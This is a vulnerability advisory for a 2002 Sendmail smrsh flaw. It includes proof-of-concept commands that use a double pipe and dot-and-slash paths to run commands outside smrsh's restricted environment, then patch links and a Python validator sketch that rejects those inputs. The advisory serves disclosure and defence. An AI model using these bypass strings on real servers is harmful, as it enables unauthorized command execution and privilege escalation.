Sendmail SMRSH Double Pipe Access Violation Vulnerability

Published: 2002-10-08
Updated: 2002-10-08
Severity: High
Threat: Privilege escalation
Error type: Input validation error
Exploitation: Server mode
BUGTRAQ ID: 5845

Affected systems

Sendmail Consortium Sendmail 8.12.0

Detailed description

Sendmail is an open-source mail transfer agent that runs on many UNIX and Linux operating systems.

smrsh is designed to prevent commands from being executed outside a restricted environment. However, when the command input uses a double pipe (||) or a mixture of dot (.) and slash (/) characters, a user can bypass the smrsh checks, and the command is executed outside the restricted environment.

Test code

    $ echo "echo unauthorized execute" > /tmp/unauth
    $ smrsh -c ". || . /tmp/unauth || ."
    /bin/sh: /etc/smrsh/.: is a directory
    unauthorized execute

Or run the following commands:

    smrsh -c "/ command"
    smrsh -c "../ command"
    smrsh -c "./ command"
    smrsh -c "././ command"

Solution

Patch downloads:

Sendmail Consortium Sendmail 8.12.0:
    Sendmail Consortium Patch smrsh-20020924.patch
    http://www.sendmail.org/patches/smrsh-20020924.patch
Sendmail Consortium Sendmail 8.12.1:
    Sendmail Consortium Patch smrsh-20020924.patch
    http://www.sendmail.org/patches/smrsh-20020924.patch
Sendmail Consortium Sendmail 8.12.2:
    Sendmail Consortium Patch smrsh-20020924.patch
    http://www.sendmail.org/patches/smrsh-20020924.patch
Sendmail Consortium Sendmail 8.12.3:
    Sendmail Consortium Patch smrsh-20020924.patch
    http://www.sendmail.org/patches/smrsh-20020924.patch
Sendmail Consortium Sendmail 8.12.4:
    Sendmail Consortium Patch smrsh-20020924.patch
    http://www.sendmail.org/patches/smrsh-20020924.patch
Sendmail Consortium Sendmail 8.12.5:
    Sendmail Consortium Patch smrsh-20020924.patch
    http://www.sendmail.org/patches/smrsh-20020924.patch
Sendmail Consortium Sendmail 8.12.6:
    Sendmail Consortium Patch smrsh-20020924.patch
    http://www.sendmail.org/patches/smrsh-20020924.patch

Related information

zen-parse <zen-parse@gmx.net>.
Reference: http://www.sendmail.org/
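The bypass described above comes from checking only part of the command line and from accepting "." or "/" as a program name. The following is an added example, not code from smrsh or from the Sendmail patch: a sketch of a restricted-command check that vets every segment of a chained command. The function names, the separator and metacharacter sets, and the "vacation" program are assumptions made for illustration.

```python
import os
import re
import shlex
import tempfile

SEPARATORS = re.compile(r"\|\||&&")   # assumption: only || and && may chain commands
FORBIDDEN = set("`<>;$()|&\n\r")      # assumption: other metacharacters are refused


def vet(cmdline, cmd_dir):
    """Return one argv list per chained command, or raise ValueError."""
    vetted = []
    for segment in SEPARATORS.split(cmdline):
        if FORBIDDEN & set(segment):
            raise ValueError(f"metacharacter in {segment!r}")
        words = shlex.split(segment)
        name = os.path.basename(words[0]) if words else ""
        # "/", "./" and "../" leave no name at all; "." and ".." name directories.
        if name in ("", ".", ".."):
            raise ValueError(f"no program name in {segment!r}")
        path = os.path.join(cmd_dir, name)
        # Only a regular executable file inside cmd_dir may run, never cmd_dir itself.
        if not (os.path.isfile(path) and os.access(path, os.X_OK)):
            raise ValueError(f"{name!r} is not an allowed program")
        vetted.append([path] + words[1:])
    return vetted


def demo():
    """Vet constructed command lines against a constructed stand-in for /etc/smrsh."""
    cases = ["vacation user", "/usr/bin/vacation user || vacation x",
             ". || . /tmp/unauth || .", "/ command", "../ command", "././ command"]
    results = {}
    with tempfile.TemporaryDirectory() as cmd_dir:
        prog = os.path.join(cmd_dir, "vacation")   # constructed allowed program
        with open(prog, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(prog, 0o755)
        for case in cases:
            try:
                results[case] = vet(case, cmd_dir)
            except ValueError as err:
                results[case] = f"rejected: {err}"
    return results


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case!r:45} -> {outcome}")
```

The four command lines from the test code above are all rejected, while a plain program name or a path whose last component is an allowed program is mapped into the restricted directory.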